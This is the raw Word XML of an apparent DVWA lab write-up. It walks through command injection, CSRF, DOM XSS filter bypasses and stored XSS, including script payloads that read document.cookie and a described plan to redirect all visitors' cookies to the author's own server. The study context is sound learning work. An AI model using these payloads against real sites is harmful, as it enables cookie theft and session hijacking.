          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEF3903" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6AF929" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E58845" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A96188" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210F8D87" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB535E7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE1D227" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc115782540"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection – Medium level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="38483075" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4477CFF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p>
    <w:p w14:paraId="43714FC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D0E6F7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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EAD84B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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8E0DE6" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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53B7F91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I found this page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4532BB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="00000000" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="009F55FC" w:rsidRPr="00A73FE2">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7645462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A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4181589D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00A73FE2" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A315DD2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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2E91282" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72780188" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc115782541"/>
      <w:r>
        <w:t>CSRF (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="00DFA570" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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1EDA63E0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc115782542"/>
      <w:r>
        <w:t>CSRF – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="3B3645F8" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The attacker can trick the user to click on a link that has a parameter like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2705E9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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701A9076" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Then the attacker can fake a confirmation page where behind the scenes they forced the user to change the password to one only the attacker knows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4624F062" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="1226C0A3" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="73B8E94E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="17DB491A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="52903659" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="0181CE40" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="6BD21F86" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7710534F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc115782543"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS DOM (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4858FE33" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The Cross-Site Scripting in a method to inject JavaScript codes onto the user’s website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191CD826" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">It happens when the attacker modifies the DOM variable in the victim’s browser. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CF9AF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc115782544"/>
      <w:r>
        <w:t>XSS DOM – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="5B2353D0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The website asks us to choose a language. After submitting, we notice that the URL look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755336F7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00075BF0" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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F060E3" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="3FFE3FC7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>And the form looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E17A61" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="3EC774DB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">We can inject a script tag between the option tag, and it would be executed. How to inject the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code inside that tag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DACF1A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">Immediately after the selected language in the URL, we can add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5947CE3E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r w:rsidRPr="008F1777">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F1777">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F1777">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C00A66" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>This code would be executed since the website took it without any security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5BB7C9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">We can do other things between the script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tag,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it depends on the attacker and the purpose of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A64D7F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="47F7D2CF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="095F2898" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc115782545"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS DOM – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="22A4F715" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>When trying the previous method here, it does not work. Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7AC62" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The developer knew about our trick and decided to put the word ‘script’ on the blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148CF795" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>What can we do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02C9A5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>We can try one of these methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEB9D3" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00782BA9" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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4F2BA94B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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590A93B0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w: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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>It would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA83B5" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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215B87E7" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="01F950E8" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="008F1777" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="54A1770C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc115782546"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS DOM – High Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="5160EBFD" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="50430D78" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">The PHP code is written to secure the website. We can force the website to take our code through hiding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code from the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768933B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="070FC8C0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc115782547"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS Stored &amp; Reflected (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="039517F0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="09C40FC8" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w: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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">XSS Stored is </w:t>
      </w:r>
      <w:r w:rsidRPr="005F0A5C">
        <w:t>persistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as it stays in the database until someone manually removes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE35896" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>XSS Reflected is when the website receives HTTP data and includes that data within the response which may cause damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA734C" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc115782548"/>
      <w:r>
        <w:t>XSS Stored &amp; Reflected – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="70B5E760" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The objective is to redirect the users to another page immediately after loading the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A33A2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">For redirecting, I could use a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function which is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() to direct the user to another page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B74BE" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I also need to find a way to force the code to stay in the database permanently or until someone manually decides to remove it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A5AEA" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>DVWA offers me 2 inputs that I can POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E9E32" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="001022E9" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>The good thing that the messages load as the same time with the actual website. Meaning the messages will load permanently just like we needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C45A4A" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>For instance, in the Message field, if I added the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C8777D" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r w:rsidRPr="00F45DAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(‘Hello World’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669CCF7F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">Every user that visits that website would get an alert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>says</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “Hello World” After the alert they can proceed to the website. The process would take place every time someone visits the website without any differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D13A38" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7DB32C37" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="5DB42AD2" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="63DBA968" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="7CFEE2EE" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="5954B0BB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="210CE1E8" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Anyways, the objective here is to redirect the user to different page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643514F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I do not have any website on mind so I will just create a server that listens to a specific port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92F6E0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="732E30A4" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Now I can redirect the users to here with their cookies using this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0CF6AB" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="11ECCA0B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Now I will get the cookies for all the users that visit the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440FBB06" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r w:rsidRPr="000D4482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: I had to adjust the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxlength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the Message input because it only allowed 50 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86A368" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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4D2B19" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2B19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What did I just do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E38BC0" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I just ruined the XSS (Stored) page, and I cannot continue working on the other tasks. Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6174FF44" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Because I every time I click on that page it redirects me to another link. How can I fix that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6071CE95" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>No idea yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F2624" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRPr="00DE2C41" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2C41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536D7CC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I launched another DVWA server and could have forget about the broken DVWA and continue with the new one. Fortunately, I really wanted to solve that problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440160BC" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Here is what I did:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8EBE9" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I launched a new DVWA server and went to XSS Stored and I clicked on “Clear Guestbook”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEF46E" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>I sent this POST request to Burp Suite and it looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3EEEF" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="2E5231E6" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="009F55FC" w:rsidP="009F55FC"/>
    <w:p w14:paraId="1A86D735" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t xml:space="preserve">If I forward this, it will just delete all the messages for the new DVWA. However, that was not the point. I want to send the exact same POST request but for the old DVWA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FABD8F" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">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4B46DE5B" w14:textId="77777777" w:rsidR="009F55FC" w:rsidRDefault="009F55FC" w:rsidP="009F55FC">
      <w:r>
        <w:t>Now I can click the XSS stored without being redirected.</w:t>
      </w:r>
    </w:p>
